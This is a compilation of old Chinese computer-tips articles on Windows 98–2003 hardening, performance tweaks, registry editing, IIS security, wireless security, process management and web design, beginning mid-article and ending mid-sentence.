    在Windows2003系统下，要进行远程网络访问连接时，该系统下的远程桌面功能可以将进行网络连接时输入的用户名以及密码，通过普通明文内容方式传输给对应连接端的客户端程序；在明文帐号传输过程中，实现“安插”在网络通道上的各种嗅探工具，会自动进入“嗅探”状态，这个明文帐号就很容易被“俘虏”了；明文帐号内容一旦被黑客或其他攻击者另谋他用的话，呵呵，小心自己的系统被“疯狂”攻击吧！为了杜绝这种安全隐患，我们可以按下面的方法来为系统“加固”：

    1、点击系统桌面上的“开始”按钮，打开开始菜单；

    2、从中执行控制面板命令，从弹出的下拉菜单中，选中“系统”命令，打开一个系统属性设置界面；

    3、在该界面中，用鼠标单击“远程”标签；

    4、在随后出现的标签页面中，将“允许用户远程连接到这台计算机”选项取消掉，这样就可以将远程访问连接功能屏蔽掉，从而堵住远程访问隐患了。

    堵住用户切换隐患

    Windows 2003系统为我们提供了快速用户切换功能，利用该功能我们可以很轻松地登录到系统中；不过在享受这种轻松时，系统也存在安装隐患，例如我们要是执行系统“开始”菜单中的“注销”命令来，快速“切换用户”时，再用传统的方式来登录系统的话，系统很有可能会本次登录，错误地当作是对计算机系统的一次暴力“袭击”，这样Windows2003系统就可能将当前登录的帐号当作非法帐号，将它锁定起来，这显然不是我们所需要的；不过，我们可以按如下步骤来堵住用户切换时，产生的安全隐患：

    在Windows 2003系统桌面中，打开开始菜单下面的控制面板命令，找到下面的“管理工具”命令，再执行下级菜单中的“计算机管理”命令，找到“用户帐户”图标，并在随后出现的窗口中单击“更改用户登录或注销的方式”；在打开的设置窗口中，将“使用快速用户切换”选项取消掉就可以了。

    堵住页面交换隐患

    Windows 2003操作系统即使在正常工作的情况下，也有可能会向黑客或者其他访问者泄漏重要的机密信息，特别是一些重要的帐号信息。也许我们永远不会想到要查看一下，那些可能会泄漏隐私信息的文件，不过黑客对它们倒是很关心的哟！Windows 2003操作系统中的页面交换文件中，其实就隐藏了不少重要隐私信息，这些信息都是在动态中产生的，要是不及时将它们清除，就很有可能成为黑客的入侵突破口；为此，我们必须按照下面的方法，来让Windows 2003操作系统在关闭系统时，自动将系统工作时产生的页面文件全部删除掉：

    1、在Windows 2003的“开始”菜单中，执行“运行”命令，打开运行对话框，并在其中输入“Regedit”命令，来打开注册表窗口；

    2、在该窗口的左边区域中，用鼠标依次单击HKEY_local_machine＼system＼currentcontrolset＼control＼sessionmanager＼memory management键值，找到右边区域中的ClearPageFileAtShutdown键值(如图2所示)，并用鼠标双击之，在随后打开的数值设置窗口中，将该DWORD值重新修改为“1”；

图2

    3、完成设置后，退出注册表编辑窗口，并重新启动计算机系统，就能让上面的设置生效了。


全面优化Win 9x系统性能

《一键清理系统垃圾》

全面优化Win 9x系统性能

  想让您的电脑“奔腾”起来吗？试一试下面的这些方法吧：
   1、不要在开机时载入太多不必要的常驻程式。删除掉Windows的墙纸。在启动菜单中将不必要的项目删除，以免影响启动速度。关掉不必要的后台软件(即系统托盘中显示的软件)。剪贴板要经常清除，重新复制一个英文字符，就可以释放出剪贴板占用的内存。
   2、不使用屏幕保护程序，因为它要占用大量内存；在屏幕空白处右击“属性/屏幕保护程序/电源”，在“关闭监视器”一项选上适当的时间，设好后，在设定时间内无任何操作，显示器会自动转入休眠状态，不但达到了屏幕保护的作用，还可以省电呢。
   3、Autoexec.bat和Config.sys中什么也不要写。
   4、不要使用Active Desktop，否则系统运行速度会因此减慢（右击屏幕，选“显示器属性/Web标签”，将其中关于“活动桌面”和“频道”的选项全部取消）。
   5、将桌面更新设为传统风格比Web风格可节省大约1MB内存。方法：选择“开始/设置/文件夹选项/常规”，设为“传统风格”。
   6、选择“开始/程序/附件/系统工具/系统信息/系统信息对话框”，然后，选择“工具/系统配置实用程序/System.ini”，点选“Vcache”，新建“Maximum=xxxx”，再新建“Minimum=xxxx”，xxxx处请依照内存大小换算后填入，公式为：内存数×256(2的8次方)，如32MB内存则填写如下：
   [Vcache]
   Maximum=8192
   Minimum=8192
   注意：xxxx≤12288。
   7、设定虚拟内存为机器内存的2.5倍，例如：有64MB的内存就设虚拟内存为160MB，且最大值和最小值都一样（此设定可通过“控制面板/系统/性能/虚拟内存”来设置）。
   8、打开“控制面板/系统/性能”，单击“文件系统”。
   ①在“硬盘”选项中，设置“这台计算机主要用于”下拉框，选择“网络服务器”(在局域网中慎用)，强迫Windows把它看成一台网络服务器，加快Windows对硬盘的读写速度。设置“预读式优化”为“完全”。
   ②将“软盘”标签中“每次启动就搜寻新的软驱”取消。
   ③点击“CD－ROM”标签，将“追加的高速缓存大小”按钮拉到最大值。再将“优化访问模式”改为“四速或更高速”，来加快系统对CD－ROM的访问速度。
   ④单击“图形”选项，设置图形“硬件加速”为“全部”。
   9、删除Font文件夹中不使用的英文字体（一定要保留Times New Roman和Marlett等字体，否则系统的基本字体会发生紊乱），可节约GDI资源。
   10、为了在使用硬盘时获得较高的性能和效率，设定Win 98使用Ultra DMA功能，即选择“控制面板/系统/设备管理器/磁盘驱动器/Generic IDE Disk Type46/设置”，选择“DMA”项，确定后，重新启动。用Winbench 98测试修改前后，选择DMA后，可使传输速率提高，而CPU利用率大幅下降（该项设置需要硬盘本身支持Ultra DMA 33/66模式，请首先确认您的硬盘是否支持该模式）。
   11、对于熟练使用Win 98的用户可以删除Help文件夹，还有Win 98的Welcome教程。
   12、启动CleanSweep 4.0或SafeClean 1.0进行注册表清理，去除多余的“脂肪”。
   13、在注册表中进行下列优化：
   ①优化硬盘驱动器
   在“HKEY－LOCAL－MACHINE\System\CurrentControlSet\Control\FileSystem”下，在右边的窗口中创建二进制值“NameCache”，NameCache是文件名缓存，32MB系统建议值为800000，64MB系统建议值为0F00000；PathCache是路径缓存，32MB系统建议为008000，64MB系统建议为0F0000。
   ②优化文件系统
   在“HKEY－LOCAL－MACHINE\System\CurrentControlSet\Control\FileSystem”下，在右边的窗口中创建一个DWORD值：“ConfigFileAllocSize”，并设为“1f4”。
   ③优化软盘驱动器的性能
   在“HKEY－LOCAC－MACHINE\System\CurrentControlSet\Services\Class\fdc\0000”下，在右边的窗口中创建一个字符串值：“ForceFIFO”，设值为“0”。
   ④加快上网速度
   在“HKEY－LOCAL－MACHINE\System\CurrentControlSet\Services\VxD\MSTCP”下，在右边的窗口中把“DefaultRcvWindow”的值改为“6400”，把“DefaultTTL”改为“128”。
   在“HKEY－LOCAL－MACHINE\System\CurrentControlSet\Services\Class\NetTrans”下，在右边窗口中创建字符串值“MaxMTU”、“MaxMSS”，并设“MaxMTU”为“576”，设“MaxMSS”为“536”。
   14、为了提高上网效率，还要进行下列优化:
   ①用记事本打开system.ini文件，在386Enh段中加入COMx（x是您接Modem的那个串口号，如1、2），buffer=1024，这样可以增加串口的缓冲区。
   ②右击“我的电脑/属性/设备管理/调制解调器/您的Modem型号/属性”，点击“调制解调器”标签，将“最快速度”设为115200，“奇偶校验”设为无，“数据位”为8，“停止位”为1，接收缓冲区和传输缓冲区设为最大。
   ③在“拨号网络”文件夹中右击您建立的连接，选择属性，在弹出的对话框中将“使用区号与拨号属性”前的对勾去掉，以免不小心而交长途话费。在“服务器类型”标签下，将拨号网络服务器类型设为“PPP：Internet，Windows NT Server，Windows 98”，将“登录网络”、“NetBEUI”、“IPX/SPX兼容”前面的对勾去掉。
   重新启动，您会发现，电脑已经“奔腾”起来了。


全面掌控无线局域网安全技巧

《一键清理系统垃圾》

全面掌控无线局域网安全技巧

    无线局域网的发展非常迅速，然而跟有线局域网一样，同样需要进行安全性的考虑。否则会给你带来文件泄露、黑客攻击等麻烦。
    1.安全检查
    无论你是在使用公共无线热点，还是仅仅连接到家庭或公司网络，你都需要使用一些
基本的原则来保护你的无线连接：
    (1)在接入点激活MAC地址验证，修改缺省的MAC地址ID和密码；
    (2)启用128位加密；
    (3)启用802.11加密；
    (4)安装个人防火墙，并正确进行配置，确保诸如信用卡号、银行帐号和电子邮件地址等信息不会在未经许可的情况泄露出去；
    (5)安装防毒软件；
    (6)如果你需要接入公司、家庭或校园网，则还需要在个人防火墙之外安装虚拟专用网如果你使用 笔记本电脑进行工作，并需要通过公共无线热点访问公司网络，则需要请求网络管理员为你建立网线连接。
    2.网络管理员的原则
    (1)深刻谨记无线网络正在工作之中。它并非向听起来那么简单。由员工或黑客安装的非法接入点能够在你不知情的情况下将一个有线网络转变成无线网络；
    (2)确保你企业建立了完善的安全政策，全体员工都必须清楚各项规定，并严格予以执行。规定无线网络的注意事项，并对网络使用的设备实施标准 化工作，确保采用最新的安全补丁和升级程序；
    (3)在无线网络之上安装虚拟专用网，最好能够采取其它一些安全措施，如安全令牌和数字证书等。通过将无线网络作为您网络的一种远程接入方式，并将其集成至您的网络安全层中，将可以为员工和合作伙伴提供双重保护的安全远程接入；
    (4)尽可能使用特定方向的体现，朝向周围360度区域进行广播的全防线天线更容易受到攻击；
    (5)在你整体安全解决方案中建立入侵检测系统；
    (6)将无线局域网视为与互联网一样不安全，并采取相应的安全措施


让Windows学会自我保护

《一键清理系统垃圾》

让Windows学会自我保护

    在Windows 98中，新增加了两个注册表检查程序，SCANREGW.EXE和SCANREG.EXE，分别用于Windows和DOS方式下。其中SCANREGW.EXE还会在每次启动Windows时自动运行（通过在注册表的自启动项中加上SCANREGW.EXE／AUTORUN），在它自动运行的过程中，对注册进行检查备份。如果充分利用好它，不仅可以执行对注册表的日常维护，还可以把你的Windows充分保护起来。下面我们就谈谈如何让Windows实现自我保护。
    首先我们要说明，SCANREGW作为应用程序，仅执行一定的功能，而它的功能设置则是通过SCANREG.INI文件来完成（位于C：\Windows目录）。SCANREG.INI中共有五个设置项。下面分别说明：
    1．BACKUP=，此项值可为0或1，默认为1；为1会在每天首次启动时运行SCANREG，为0时则不运行；
    2．OPTIMIZE=，此项值可为0或者1，默认为1；为1会在每次运行SCANREG时，自动从SYSTEM.DAT及USER.DAT中清除浪费空间，为注册表减肥。为0则不清除；
    3．MAXBACKUPCOPIES=，此项设置共要建立的备份文件的个数，可为从5（默认）到99的任一个数。默认建立5个备份文件。若想恢复原来的备份文件，应退出Windows进入DOS 方式，运行SCANREG；随后会弹出对话框，问你是要创建备份（CREAT BACKUPS），还是要显示备份（VIEW BACKUPS）；选择显示备份，又会弹出一个窗口列出了所有备份文件及各自的日期；选取合适的想恢复的备份文件即可。
    4．BACKUPDIRECTORY=，设置备份文件存放的目录，默认存放目录为C：\Windows\SYSBCKUP，备份文件名分别为RB001～05.CAB。
    5．FILES=，是否要添加其他的文件放入备份文件，默认为空，仅备份注册表及WIN.INI、SYSTEM.INI两个文件。若要添加其他文件，在FILES=后键入“<目录代码>，文件名1，文件名2，文件名3”，目录代码有4个，10代表C：\Windows目录；11代表C：\Windows\SYSTEM目录；30代表C盘根目录；31代表安装Windows的所在根目录。例如若想把CONFIG.SYS及AUTOEXEC.BAT文件包含于备份文件中，可加入“FILES=30，CONFIG.SYS，AUTOEXEC.BAT”。这一行。
    另外提一点，现在使用Windows 95的用户，也不必为了Windows 98的这项功能而去换装Windows 98。只须找到一台已安装了Windows 98的计算机，把C：\Windows\SCANREGW.EXE、C:\Windows\SCANREG.INI和C:\Windows\SCANREG.EXE三个文件拷贝到Windows 95中相应的目录下，然后找到其注册表中HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/Windows/CURRENT VERSION/RUN 子键，在其中加上一条键值，键值名为“SCANREGISTRY”，键值为“C：\Windows\SCANREGW.EXE/AUTORUN。这样，你也可以使用Windows 98的自我保护功能。
    好了，知道了如何设置SCANREG.INI，就让我们赶快行动起来，保护好我们的Windows。


让你的IIS无懈可击

《一键清理系统垃圾》

让你的IIS无懈可击

  如果你的电脑新安装了nt4/win2000以后，并不是说就可以直接用来作Internet服务器了。尽管微软的补丁打了一大堆，但还是有些漏洞。现在我们就简单的谈一下如何使用IIS建立一个高安全性能的服务器。
    一、 以Windows NT的安全机制为基础
    1）NT打SP6补丁、2K打SP2补丁。把磁盘的文件系统转换成NTFS（安装系统的分区可以在安装系统的时候转换，也可以安装完系统以后，用工具转换）。同时把使用权限里有关Everyone的写、修改的权限去掉，关键目录：如Winnt\Repair连读的权限也去掉。
    2）共享权限的修改。在NT下到开始菜单--》程序--》管理工具--》系统策略编辑器，然后打开系统策略里文件菜单里的“打开注册表”修改其中的windows NT 网络把其中勾去掉。 2K下可以写个net share c$ /delete的bat文件，放到机器的启动任务里。
    3）为系统管理员账号更名。同时把系统管理员的密码改成强加密：密码长度在10位以上，并且密码要包括数字、字母、！等各种字符。
    4）废止TCP/IP上的NetBIOS。通过网络属性的绑定选项，废止NetBIOS与TCP/IP之间的绑定。
    5）安装其他服务。应该尽量不在同台服务器上安装数据库的别的服务，如果装了的话，最主要一点是数据库密码不能跟系统的登陆密码一样。
    二、 设置IIS的安全机制
    1）IIS5安全问题在以前基础上已经大有改善.
    解决IIS4以及之前的版本受到D.O.S攻击会停止服务。 运行Regedit32.exe 在：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters 增加一个值： value Name: MaxClientRequestBuffer Data Type: REG_DWORD 设置为十进制 具体数值设置为你想设定的IIS允许接受的URL最大长度。CNNS的设置为256。
    2）删除HTR脚本映射。
    3）将IIS web server下的 /_vti_bin 目录设置成禁止远程访问。
    4）在IIS管理控制台中，点 web站点，属性，选择主目录，配置（起始点），应用程序映射，将htw与webhits.dll的映射删除。
    5）如果安装的系统是2K的话，安装Q256888_W2K_SP1_x86_en.EXE。
    6）删除:c:\Program Files\Common Files\System\Msadc\msadcs.dll。
    7）如果不需要使用Index Server，禁止或卸载该服务。 如果你使用了Index Server，请将包含敏感信息的目录的“Index this resource”的选项禁止。
    8）解决unicode漏洞： 2K安装2kunicode.exe、NT安装ntunicode86.exe。
    经过以上的设置之后,我还是不敢说它就完全安全了,你可不要回去睡大觉呀!不过你可以放松一下了!
    微软的产品虽然好用,但是它的漏洞和同类比起来是漏洞最多的一个.作为一个网管要时刻的注意新漏洞的出现,及时的采取相应的措施,做到有备无患!


认识Windows的GPF错误

《一键清理系统垃圾》

认识Windows的GPF错误

GPF（General Protection Failure即一般保护性错误。当Windows中某个应用程序对不正确的内存段进行了读写操作，导致堆栈充满溢出时，Windows就会出现GPF一般保护性错误。有时系统会提示错误信息，并要求选择Close或Ignore，选Close，系统会给出一些错误信息关闭发生GPF故障的程序，选Ignore时应用程序会继续运行，但不管选哪一项，此时的系统很不稳定。还有一种情况就是发生GPF错误时，系统连提示“out of memory”的机会都没有了，只能重新启动计算机。GPF有很大的破坏作用，能导致未存盘的文件全部丢失。为了防止GPF错误的发生，我们要注意以下几点：
    1.驱动程序是产生GPF错误的产要根源，安装驱动程序时，选择合适的驱动程序，输入正确的设置。
    2.检查系统空闲资源是否不足。打开“我的电脑”属性设置窗口，选择性能标签，如果系统资源小于20%，则应减少打开窗口和应用程序的个数，关闭不必要的窗口和应用程序。
    3.删除不必要的壁纸，少用屏幕保护程序，因为大量的壁纸和屏保会占用不少系统资源。
    4.检查是否运行了不兼容的TSR程序（即内存驻留程序）。去掉所有TSR程序，并观察应用程序是否正确运行，如果正确，逐个加载TSR程序，以判别引起GPF错误的程序。
    5.检查TEMP目录下是否有足够的可用空间，也可以把TEMP目录指向一个剩余空间很多的硬盘分区（可以通过修改注册表来实现）。
    经常对硬盘做扫描整理也能在一定程度上减少GPF错误出现的几率。此外，我们也可以在启动组中加载Windows自带诊断程序Dr.Watson，通过阅读记载于drwatsom.log文件中的错误信息获得解决方案。
    


任务管理器杀不了的进程关闭大法

《一键清理系统垃圾》

任务管理器杀不了的进程关闭大法

    Windows XP/2000的任务管理器是一个非常有用的工具，能让你看到系统中正在运行哪些程序（进程），只要你平时多看任务管理器中的进程列表，熟悉系统的基本进程，就可以随时发现可疑进程，这对防范木马和病毒大有裨益！不过有一些可疑进程，你用任务管理器却无法杀掉，这该怎么办呢？

    一、哪些系统进程不能关掉

    Windows运行的时候，会启动多个进程。只要你按下“Ctrl+Alt+Del”键打开任务管理器，点击“查看”/选择列，勾选“PIO（进程标识符）”，然后单击“进程”标签，即可看到这些进程（如下图1）。不过有一些进程个人用户根本用不到，例如Systray.exe（显示系统托盘小喇叭图标）、Ctfmon.exe（微软Office输入法）、Winampa.exe等，我们完全可以禁止它们，这样做并不会影响系统的正常运行。

    二、如何关闭任务管理器杀不了的进程

    如果你在任务管理器中无法关闭某个可疑进程，可以使用下面的方法强行关闭，注意不要杀掉进程表中的系统核心进程：

    1． 使用Windows XP/2000自带的工具

    从Windows 2000开始，Windows系统就自带了一个用户态调试工具Ntsd，它能够杀掉大部分进程，因为被调试器附着的进程会随调试器一起退出，所以只要你在命令行下使用Ntsd调出某进程，然后退出Ntsd即可终止该进程，而且使用Ntsd会自动获得Debug权限，因此Ntsd能杀掉大部分的进程。

    操作方法：单击“开始”/程序/附件/命令提示符，输入命令：ntsd -c q -p PID（把最后那个PID，改成你要终止的进程的PID）。在进程列表中你可以查到某个进程的PID，例如我们要关闭图1中的Explorer.exe进程，输入：ntsd -c q -p 408即可。

    以上参数-p表示后面跟随的是进程PID， -c q表示执行退出Ntsd的调试命令，从命令行把以上参数传递过去就行了。

    2． 使用专门的软件来杀进程

    任务管理器杀不掉的进程，你可以使用专门的软件关闭。有很多软件可以杀进程，例如进程杀手、IceSword、柳叶擦眼、系统查看大师、Kill process等。

    （1）进程杀手2.5（下载地址点击下载）

    它能够浏览系统中正在运行的所有进程，包括用Ctrl+Alt+Del 看不到的进程，可以精简进程、自动中止系统基本进程以外的所有进程，对木马和病毒进程有一定清除作用，你可以用它随时中止任一个正在运行的进程，选中该进程，按“中止进程”按钮即可。

    （2）IceSword（下载地址点击下载）

    如今系统级木马后门功能越来越强，一般都可轻易隐藏进程、端口、注册表、文件信息，普通进程工具根本无法发现这些“幕后黑手”。IceSword使用大量新颖的内核技术，可以查出所有隐藏进程。

    要查看当前进程，请点击“进程”按钮，在右部列出的进程中，隐藏的进程会以红色醒目地标记出，以方便查找系统级后门。如果要结束某进程，可以先选中它（按住Ctrl键可选择多个进程），然后使用右键菜单的“结束进程”，即可关闭之。

    （3）柳叶擦眼（点击下载）

    它可以列出系统中所有的进程（包括隐藏的），并可以杀死进程，能自动标示出系统文件，自动中止基本进程外的所有进程，还具有IE保护功能。

    运行软件后，单击“柳叶擦眼”可以显示当前正在运行的所有进程，你只需注意那些“定义级别”为“未知”及“危险”的进程，按“降妖伏魔”按钮关闭它们即可。

    （4）系统查看大师1.0（点击下载）

    目前许多木马都是在后台运行的，它们运行时会隐藏自己的窗口，因此你无法在屏幕上看到它们。该软件可以获取隐藏的不可见窗口，让你发现木马踪影、关闭之。

    软件运行后，在左侧视图中点击“取不可见窗口”按钮，右侧的窗口中就会显示出所有当前运行的、隐藏的不可见窗口标题，选定其中的可疑窗口，然后点击右下端的“结束此窗口”按钮，即可关闭之。如果你要关闭某进程，可以单击“进程列表”按钮，选中该进程，然后右击鼠标在弹出的窗口中，单击“结束进程”即可。

作者：
来源：中国电脑教育报


任意放置你的“控制面板”

《一键清理系统垃圾》

任意放置你的“控制面板”

    Windows 98的控制面板是系统维护的“工具箱”，对于每一位使用者，总是希望把工具放在自己最顺手的地方，可是Windows 98偏偏不为我们提供方便，那我们就自己归拢归拢它吧。
    一、给“开始”菜单再添一道大菜
    对于每一位Windows 98的用户，一定熟悉它的“开始”菜单，当鼠标停留在含有下一级菜单的菜单项时，稍等片刻，下一级菜单将自动展开，我们也可以将“控制面板”设置成这样的菜单，具体实现步骤如下：
    1.打开记事本程序，编辑一行“控制面板.{21EC2020－3AEA－1069－A2DD－08002B30309D}”文字，注意“控制面板”与“{”之间有一个点，然后将其选定并复制到剪贴板。
    2.用鼠标右键单击“开始”按扭，选择快捷菜单的“打开”命令，在“打开”对话框中新建一文件夹，用鼠标右键单击此文件夹，选择快捷菜单的“重命名”命令，然后按下“Ctrl＋V”组合键，新建的文件夹图标迅速改变为系统默认的“控制面板”图标。笔者提醒你注意的是，给新建的文件夹重命名时，倘若采用直接输入“控制面板。{21EC2020－3AEA－1069－A2DD－08002B30309D}”字符的方式，“控制面板”文件夹的创建将要失败，建议首先采用记事本编辑然后复制的方法。
    3.单击“开始”按钮指向新建的“控制面板”选项，停留片刻，控制面板中那些熟悉的图标即刻出现在你的面前。
    二、把“控制面板”放到桌面上
    通常，在“我的电脑”对话框中，用鼠标单击“控制面板”图标，选择快捷菜单的“创建快捷方式”命令，弹出一个提示信息为“Windows无法在当前位置创建快捷方式。要把快捷方式放在桌面上吗”的对话框，当回答“是”后，即可在桌面上创建“控制面板”的快捷方式图标。
    三、把“控制面板”放到任务栏上
    当打开的应用程序窗口比较多时，桌面上的“控制面板”图标将被覆盖，这对“控制面板”中各个应用程序的使用带来不便，为此，有必要将其放置到“任务栏”上，你只要将桌面上建立的“控制面板”图标或其快捷方式图标拖放到“任务栏”的“快速启动”工具栏上即可。
    最后，值得一提的是，采用本文介绍的方法，可以将“拨号网络”文件夹（拨号网络.{992CFFA0－F557－101A－88EC－00DD010CCC48}）和“打印机”文件夹（打印机.{2227A280－3AEA－1069－A2DE－08002B30309D}）进行类似的设置。


如何打开注册表编辑器（从Win98到WinXP）

《一键清理系统垃圾》

如何打开注册表编辑器（从Win98到WinXP）

    2002-01-28　　　　 作者：

    要手工编辑注册表，就要求打开注册表编辑器，这是必然的。那么如何打开注册表编辑器呢？在NT架构

的系统上有什么方法可以打开新版本的注册表编辑器呢？本文将详细回答你的问题。

    首先出场的是Win98/Me，因为Win98和WinMe没有大的区别，所以这里放在一起讲述。在Win98/Me里面的注册表编辑器只有一种，就是最"原始"的那一种。之所以说他原始是因为他没有任何安全限制，也就是说它的注册表编辑器可以被任意一个用户打开，并没有任何权限限制。这主要是因为Win98/Me的使用对象是一般的单机用户，不需要限制权限，这一点和NT/2000/XP有很大的不同。打开的方法：
1.最简单的方法：开始--运行中输入regedit就可以了。
2.另外一种方法：在Windows目录下找到regedit.exe，直接双击也可以打开。　　随后是Win2000/XP出场。因为2000/XP在设计时加上了权限这一概念，所以在这2个系统里面有2种方法可以打开注册表编辑器。一种是直接在开始--运行中输入regedit，出现的界面和98/Me一样。这里就不详细说明了。另外一种打开方式是本文的重点内容----有权限限制的注册表编辑器（打开方法：开始----运行中输入regedt32）。如图所示（这里是WinXP的截图，Win2000下的截图和WinXP是一样的）。

大家可以在图1中看到当你选中一个键值的时候，编辑下拉菜单下就可以看到一个选项----权限，用鼠标单击这个选项以后会出现图2的窗口。用鼠标分别单击各个用户组就可以看到不同的权限限制，如果你觉得某一个用户组的权利太高了，就可以在下方修改权限（注意：必须赋予Administrators组用户完全权限，否则一旦你或相应的软件、驱动程序要修改注册表，但是由于所有的组用户都没有权限修改，所以你将不能够成功安装。所以必须把完全权限赋予Administrators组用户（系统默认）。图3是Administrators组用户所拥有的权限。看了这些以后我想大家都应该知道该如何正确的打开注册表编辑器了吧，如果还不清楚的话就请看下面这张表，看了以后如果还有问题的话欢迎留言或发Email给我

操作系统版本 打开方法 注意事项
Win98/98SE/Me　 运行中输入regedit.exe 因为98/ME里面没有任何有效的权限限制功能，所以任何用户均对注册表由完全控制功能。
Win2000/XP　 1.运行中输入regedit.exe
  2.运行中输入regedt32.exe 使用第一种方法打开的注册表编辑器和Win98下的界面一样，而且功能也一样，用佯没有可以设置权限的地方，但是使用第二种方法打开的注册表编辑器就可以很方便的设置权限，如果你作为一个网络管理员的话，建议你安装完系统以后使用第2种方法打开注册表编辑器，然后修改需要修改的权限设置部分以免被他人恶意修改。


如何恢复出错的输入法

《一键清理系统垃圾》

如何恢复出错的输入法

    到网吧里上网时，经常见到别人对你说一串拼音，问他怎么回事？他告诉你：wo zhe li mei you shu ru fa!!（我这里没有输入法）而添加输入法时系统又老是要提示你：XXX文件找不到！请放入Windows光盘！
    谁会没事带着一张Windows光盘去上网呀？其实这里是可以不用光盘的！解决的方法很简单：
    首先打开“控制面板”，双击“输入法”，单击“添加”，添加你要用的输入法。比如我们来添加“微软智能ABC输入法”。单击“添加”，选择智能ABC输入法，单击“确定”，再单击“确定”，此时便会弹出一个系统提示：请插入标签为“Windows 98第二版CD－ROM”的磁盘，然后单击“确定”。无须理会提示，单击“确定”后，出现一个正在复制文件的提示窗口，在下面的地址栏里输入：
    C:\Windows\System （这里默认为系统安装在C:\Windows目录下）
    单击确定后，再次弹出同样的提示窗口，此时在地址栏输入：
    C:\Windows\Help
    你会看到进度条又前进了一些，再次出现提示窗口时又输入：
    C:\Windows\System
    进度条又前进一些，再次出现提示窗口时又输入：
    C:\Windows\Help 再次……
    反复地输入以上两个地址，就能成功地添加智能ABC输入法了！点击右下角任务栏上的指示器，你又可以使用智能ABC输入法了！
    （编者注：其实这个方法也适用于其他提示需要插入Windows光盘的时候。一般系统都会这样提示你：在Windows 98 第二版　CD－ROM上找不到XXX文件。这时你可以在“开始”菜单点击“查找”，在名称栏里输入上面提示找不到的XXX文件，搜索“我的电脑”。一般都能够找到这个文件在Windows目录下的某某处，然后再在提示插盘的窗口地址栏里输入正确的路径就可以了！当然，如果找不到这个文件，你也就只好乖乖地放盘了！）


如何设计网页

《一键清理系统垃圾》

如何设计网页

在网页设计的认识上，许多人似乎仍停留在网页制作的高度上。认为只要用好了网页制
作软件，就能搞好网页设计了。
其实网页设计是一个感性思考与理性分析相结合的复杂的过程，它的方向取决于设计的
任务，它的实现依赖于网页的制作。正所谓“功夫在诗外”，网页设计中最重要的东西
，并非在软件的应用上，而是在我们对网页设计的理解以及设计制作的水平上，在于我
们自身的美感以及对页面的把握上。
首先，我们要弄清楚网页设计的任务。

一、设计的任务

设计是一种审美活动，成功的设计作品一般都很艺术化。但艺术只是设计的手段，而并
非设计的任务。设计的任务是要实现设计者的意图，而并非创造美。
网页设计的任务，是指设计者要表现的主题和要实现的功能。站点的性质不同，设计的
任务也不同。从形式上，可以将站点分为以下三类。
第一类是资讯类站点，像新浪、网易、搜狐等门户网站。这类站点将为访问者提供大量
的信息，而且访问量较大。因此需注意页面的分割、结构的合理、页面的优化、界面的
亲和等问题。
第二类是资讯和形象相结合的网站，像一些较大的公司、国内的高校等。这类网站在设
计上要求较高，既要保证资讯类网站的上述要求，同时又要突出企业、单位的形象。然
而就现状上来看，这类网站有粗制滥造的嫌疑。
第三类则是形象类网站，比如一些中小型的公司或单位。这类网站一般较小，有的则有
几页，需要实现的功能也较为简单，网页设计的主要任务是突出企业形象。这类网站对
设计者的美工水平要求较高。
当然，这只是从整体上来看，具体情况还要具体分析。不同的站点还要区别对待。别忘
了最重要的一点，那就是客户的要求，它也属于设计的任务。
明确了设计的任务之后，接下来要想的就是如何完成这个任务了。

二、设计的实现

设计的实现可以分为两个部分。第一部分为站点的规划及草图的绘制，这一部分可以在
纸上完成。第二部分为网页的制作，这一过程是在计算机上完成的。
设计首页的第一步是设计版面布局。我们可以将网页看作传统的报刊杂志来编辑，这里
面有文字、图像乃至动画，我们要做的工作就是以最适合的方式将图片和文字排放在页
面的不同位置。
除了要有一台配置不错的计算机外，软件也是必需的。不能简单地说一个软件的好坏，
只要是设计者使用起来觉得方便而且能得心应手的，就可以称为好软件。当然，它应该
能满足设计者的要求。笔者常用的软件是Macromedia的Dreamweaver、Fireworks、
Flash以及Adobe的Photoshop、imageready，这些都是很不错的软件。
接下来我们要做的就是通过软件的使用，将设计的蓝图变为现实，最终的集成一般是在
Dreamweaver里完成的。虽然在草图上，我们定出了页面的大体轮廓，但是灵感一般都
是在制作过程中产生的。设计作品一定要有创意，这是最基本的要求，没有创意的设计
是失败的。在制作的过程中，我们会碰到许多问题，其中最敏感的莫过于页面的颜色
了。

四、造型的组合

在网页设计中，我们主要通过视觉传达来表现主题。在视觉传达中，造型是很重要的一
个元素。抛去是图还是文字的问题，画面上的所有元素可以统一作为画面的基本构成要
素点、线、面来进行处理。在一幅成功的作品里，是需要点、线、面的共同组合与搭配
来构造整个页面的。
通常我们可以使用的组合手法有秩序、比例、均衡、对称、连续、间隔、重叠、反复、
交叉、节奏、韵律、归纳、变异、特写、反射等等，它们都有各自的特点。在设计中应
根据具体情况，选择最适合的表现手法，这样有利于主题的表现。
通过点、线、面的组合，可以突出页面上的重要元素，突出设计的主题，增强美感，让
观者在感受美的过程中领会设计的主题，从而实现设计的任务。
造型的巧妙运用不仅能带来极大的美感，而且能较好地突出企业形象，而且能将网页上
的各种元素有机的组织起来，它甚至还可以引导观者的视线。

三、色彩的运用

色彩是一种奇怪的东西，它是美丽而丰富的，它能唤起人类的心灵感知。一般来说，红
色是火的颜色，热情、奔放；也是血的颜色，可以象征生命。黄色是明度最高的颜色，
显得华丽、高贵、明快。绿色是大自然草木的颜色，意味着纯自然和生长，象征安宁和
平与安全，如绿色食品。紫色是高贵的象征，有庄重感。白色能给人以纯洁与清白的感
觉，表示和平与圣洁。
我们知道，颜色是光的折射产生的，红、黄、蓝是三原色，其它的色彩都可以用这三种
色彩调和而成。换一种思路，我们可以用颜色的变化来表现光影效果，这无疑将使我们
的作品更贴近现实。
色彩代表了不同的情感，有着不同的象征含义。这些象征含义是人们思想交流当中的一
个复杂问题，它因人的年龄、地域、时代、民族、阶层、经济地区、工作能力、教育水
平、风俗习惯、宗教信仰、生活环境、性别差异而有所不同。
单纯的颜色并没有实际的意义，和不同的颜色搭配，它所表现出来的效果也不同。比如
绿色和金黄、淡白搭配，可以产生优雅，舒适的气氛。蓝色和白色混合，能体现柔顺、
淡雅、浪漫的气氛。红色和黄色、金色的搭配能渲染喜庆的气氛。而金色和粟色的搭配
则会给人带来暖意。设计的任务不同，配色方案也随之不同。考虑到网页的适应性，应
尽量使用网页安全色。
但颜色的使用并没有一定的法则，如果一定要用某个法则去套，效果只会适得其反。经
验上我们可先确定一种能表现主题的主体色，然后根据具体的需要，应用颜色的近似和
